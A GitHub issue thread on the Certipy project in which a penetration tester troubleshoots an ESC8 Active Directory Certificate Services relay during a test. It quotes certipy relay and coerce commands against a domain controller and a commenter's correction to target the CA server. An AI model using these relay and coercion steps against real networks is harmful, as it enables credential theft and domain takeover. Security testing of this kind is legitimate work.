Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Help determining if ESC8 vulnerability is false positive? #202

Open
7MinSec opened this issue Mar 17, 2024 · 3 comments
Open

Help determining if ESC8 vulnerability is false positive? #202

7MinSec opened this issue Mar 17, 2024 · 3 comments

Comments

@7MinSec
Copy link

7MinSec commented Mar 17, 2024

Hello!

On a test I've found a config reporting vulnerable to ESC8. I setup certipy relay -target vulnca.domain.com when I try to coerce from a DC with coerce -u user -p pass -t ip.of.a.dc -l my.attacking.kali.ip my smb.log is filled with entries like:

Received connection from DOMAIN/DC$ at DC01$, connection will be relayed after re-authentication

Any ideas of what's going on here? Not sure what to try next.

@fgeek
Copy link

fgeek commented Mar 17, 2024

In ESC8 you should be relaying to the ADCS CA server, not DC. Remember to define the affected template. It should work with hostname instead of IP, but try both if one does not work.

https://github.com/ly4k/Certipy?tab=readme-ov-file#esc8

@7MinSec
Copy link
Author

7MinSec commented Mar 17, 2024

Ah geez thank you...I think I was up too late working on this and not defining targets right. I'll give it another dance once I've had some sleep :-)

@7MinSec
Copy link
Author

7MinSec commented Mar 17, 2024

OK I got things reconfigured and the relay is happening but not successful. I got a second opinion through ntlmrelayx and I'm getting "No NTLM challenge returned from server" so I'm thinking they've hardened the config?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants